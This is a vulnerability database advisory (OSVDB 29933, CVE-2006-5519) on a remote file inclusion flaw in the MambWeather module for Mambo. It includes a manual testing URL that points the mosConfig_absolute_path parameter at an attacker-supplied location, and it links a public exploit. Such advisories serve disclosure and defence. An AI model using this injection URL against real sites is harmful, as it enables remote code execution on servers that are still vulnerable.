MambWeather for Mambo Savant2_Plugin_options.php mosConfig_absolute_path Variable Remote File Inclusion

2006-10-22T08:03:55
ID OSVDB:29933
Type osvdb
Reporter OSVDB
Modified 2006-10-22T08:03:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

This may be the same issue as Mosets Tree package (OSVDB 28708) which is included in the MambWeather module.

Manual Testing Notes

http://[target]/[path]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker]

References:

Secunia Advisory ID:22521 ISS X-Force ID: 29697 Generic Exploit URL: http://milw0rm.com/exploits/2613 FrSIRT Advisory: ADV-2006-4150 CVE-2006-5519 Bugtraq ID: 20667